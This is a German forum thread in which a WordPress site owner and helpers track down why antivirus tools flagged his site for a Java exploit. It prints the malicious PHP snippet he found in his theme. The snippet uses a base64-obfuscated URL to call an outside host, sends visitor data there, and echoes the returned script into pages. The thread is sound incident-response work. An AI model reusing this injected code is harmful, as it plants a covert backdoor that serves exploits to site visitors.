Hallo Peter,
...hast du das aktuelle Update 3.6.1 von WordPress installiert?

Mit dem Update wurden mehrere Sicherheitslücken geschlossen.
Unter anderem das sogenannte "Link injection" (= Einschleusen von Links)

Zitat:

...und drei Sicherheitslücken wurden behoben, die beispielsweise Link Injection, das Ausführen fremden Codes oder das Verfassen von Beiträgen unter falschem Namen ermöglichten.

Link Heise Original-Artikel
s.a. Artikel hier auf Trojaner-Board: Wordpress-Update schließt Sicherheitslücken

DAS könnte vielleicht dein Problem verursacht haben...!?

Zitat:

Zitat von jrahe

Hallo Peter,
...hast du das aktuelle Update 3.6.1 von WordPress installiert?

Mit dem Update wurden mehrere Sicherheitslücken geschlossen.
Unter anderem das sogenannte "Link injection" (= Einschleusen von Links)
Link Heise Original-Artikel
s.a. Artikel hier auf Trojaner-Board: Wordpress-Update schließt Sicherheitslücken

DAS könnte vielleicht dein Problem verursacht haben...!?

Hallo jrahe,

ja, das Update habe ich direkt nach erscheinen durchgeführt. Ich habe grad von einem Besucher noch eine E-Mail mit weiteren Informationen zum Virus erhalten, ich habe dazu das Bild von F-Secure hochgeladen das er mir schickte. Da wird "Exploit: Java/CVE-2013-2460.A" erwähnt. Diese Sicherheitslücke war im aktuellen Wordpress Update nicht enthalten.

...vielleicht kannst du bei WordPress diesen Fall schildern und nähere Infos bzw. Unterstützung für dein weiteres Vorgehen erhalten.

Wenn es sich hier um eine Sicherheitslücke in WordPress handelt, die bei diesem Update noch nicht berücksichtigt wurde, so besteht ja die Chance, daß sie noch ein weiteres Update herausbringen.

EDIT:
Der Fehler resp. die Infizierung muss ja nicht in deinen Dateien liegen, sondern kann durchaus auch im "System" WordPress oder auf deren Servern liegen.

Zitat:

Zitat von jrahe

...vielleicht kannst du bei WordPress diesen Fall schildern und nähere Infos bzw. Unterstützung für dein weiteres Vorgehen erhalten.

Wenn es sich hier um eine Sicherheitslücke in WordPress handelt, die bei diesem Update noch nicht berücksichtigt wurde, so besteht ja die Chance, daß sie noch ein weiteres Update herausbringen.

Ok, vielen Dank für die bisherige Hilfe! Auch an die anderen Antworter. Ich denke ich bin dem Problem dadurch schon erheblich näher gekommen.

Zitat:

Zitat von jrahe

EDIT:
Der Fehler resp. die Infizierung muss ja nicht in deinen Dateien liegen, sondern kann durchaus auch im "System" WordPress oder auf deren Servern liegen.

Die Wordpress Installation liegt vollständig auf meinem Webspace. Andere Webseiten die auf diesem Webspace Account liegen sind laut bitdefender & f-secure nicht vom Virus betroffen ;-)

Zitat:

Zitat von pexmar

...Die Wordpress Installation liegt vollständig auf meinem Webspace. Andere Webseiten die auf diesem Webspace Account liegen sind laut bitdefender & f-secure nicht vom Virus betroffen...

Das spricht dafür, dass die Ursache in deinen Dateien oder denen der WordPress-Installation liegt.


Vermutung 1:
Ich vermute WordPress als Ursache, da diese ja gerade mit dem letzten Update mehrere Sicherheitslücken gefixt haben, u.a. die der "Link injektion".


Vermutung 2:
Des weiteren vermute ich keinen direkten "Exploit: Java.." in dieser WordPress Installation, sondern eher das ungewollte Ausführen fremder Links ("http://kindergardenburn.biz" im Post #2 und "swtcommfickner.biz" im Post #11), die dazu dienen, von den so aufgerufenen Servern das Java-Exploit herunterzuladen.
Somit sind bei Argus im Post #2 und bei Darklord666 im Post #11 durch z.B. NoScript diese Aufrufe zum Ausführen/Installieren der dort gespeicherten Anwendung (= Java-Exploit) verhindert worden.

Bei dem Besucher, dessen Screenshot du im Post #17 hast, ist wahrscheinlich kein NoScript als Addon installiert, so daß dieser Aufruf ausgeführt wurde. Bei ihm wurde dann der Download des Java-Exploit vom Virenscanner (F-Secure) abgeblockt.

Das könnte auch der Grund dafür sein, daß deine website als solche von F-Secure auf Nachfrage nachträglich als "nicht gefährlich" eingestuft worden ist (Post #10), da der Java-Exploit selbst nicht bei dir auf der website/Server liegt, sondern nur aufrufende Links generiert werden.

Ok. Da ich die Seite ja recht häufig aufrufe und lange Zeit nur mit Windows Standard Sicherheitstools und Avira (free), könnte ja eine Wahrscheinlichkeit bestehen, dass der Virus/die Malware sich bei mir auch runtergeladen hat. Ich habe mit dem Bitdefender einen Virencheck durchgeführt, er hat nichts bedrohliches gefunden. Besteht ein realistisches Restrisiko, dass Bitdefender sowas übersehen hat?

...ja, ein Restrisiko besteht IMMER nach jeder Reinigung, aber auch bei jedem Vollscan, daß etwas übersehen wurde.

Der von dem Besucher erwähnte "Exploit: Java/CVE-2013-2460" ist im Juni gepatched worden und greift ältere Java7-Versionen an.
Gepatched bedeutet, daß neuere Java7-Installationen/Updates ab Juli 2013 gegen diesen Exploit geschützt sein sollten.
Wie lange diese Infektion bei deiner website schon besteht, wie lange dieser Java-Exploit schon geladen wurde und ob du zu diesen Zeitpunkten ein nicht aktuelles Java7 installiert hattest, kann ich nicht sagen...

Wenn du sicher gehen möchtest, kannst du deinen Rechner hier im Forum "Plagegeister aller Art..." einmal untersuchen lassen.
(s.a.: Hinweise zur Eröffnung eines Themas)

Hierbei handelt es sich dann aber um ein "neues" Problem (= des deines "privaten" Rechners)

WICHTIG wäre natürlich nach wie vor die Ursache für die ungewollten Links/Scripte auf deiner website zu finden.

Ok, danke für den Tipp!
Ich bin bei meiner weiteren Suche auf folgenden Codepart in meinem Theme gestoßen:

Code: Alles auswählenAufklappen

ATTFilter

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>
         

Ich gehe stark davon aus, dass das der Schädling ist/war. Jetzt bleibt nur noch rauszufinden was die Backdoor war. Da hoffe ich, dass mir die Wordpress-Community mit ihrer Erfahrung weiterhelfen kann.

Viel Erfolg!

Bei weiteren Erkenntnissen kannst du diese hier gerne posten, so dass andere Betroffene hoffentlich auch eine "Lösung" finden können.

EDIT:
Wo kam dein Theme denn her?
Komplett selbst gestaltet oder als Vorlage heruntergeladen resp. in WordPress enthalten?
War der Code eventuell schon enthalten oder ist er später infiltriert worden?

Viel Erfolg bei der Recherche...

Zitat:

Zitat von jrahe

Viel Erfolg!

Bei weiteren Erkenntnissen kannst du diese hier gerne posten, so dass andere Betroffene hoffentlich auch eine "Lösung" finden können.

EDIT:
Wo kam dein Theme denn her?
Komplett selbst gestaltet oder als Vorlage heruntergeladen resp. in WordPress enthalten?
War der Code eventuell schon enthalten oder ist er später infiltriert worden?

Viel Erfolg bei der Recherche...

Sorry, hab deinen Nachtrag nicht gesehen gehabt.
Mein Theme ist selbst gestaltet auf Grundlage des twentyten-Themes (wenn ich mich recht entsinne) von Wordpress.
Das heißt das HTML-Grundgerüst wurde größtenteils beibehalten und das Stylesheet wurde neu geschrieben.

Allen, die ähnliche Probleme haben, empfehle ich das Plugin "Exploit Scanner" für Wordpress. Dort muss man insbesondere auch nach der Funktion base64_decode ausschau halten. Sie wird in Wordpress nur selten im Originalzustand verwendet. Diese Funktion wird häufig verwendet um URLs im Code verschlüsselt darzustellen.

...könnte das "twentyten-Theme" von WordPress schon infiziert gewesen sein?

Zitat:

Zitat von jrahe

...könnte das "twentyten-Theme" von WordPress schon infiziert gewesen sein?

Dazu ist die Homepage zu lange problemlos gelaufen und ohne von Antiviren Software blockiert zu werden. Deshalb denke ich eher nicht.

So, die gute Nachricht ist heute eingetroffen: Das Virenlabor von Bitdefender bestätigte mir soeben schriftlich, dass die Homepage nun frei von Schädlingen ist.
Ich denke man kann also davon ausgehen, dass oben genannter Code der einzige Schädling war.

Ich bedanke mich sehr bei allen die mit Tipps und Hinweisen geholfen haben den Schädling zu entarnen und entfernen ;-)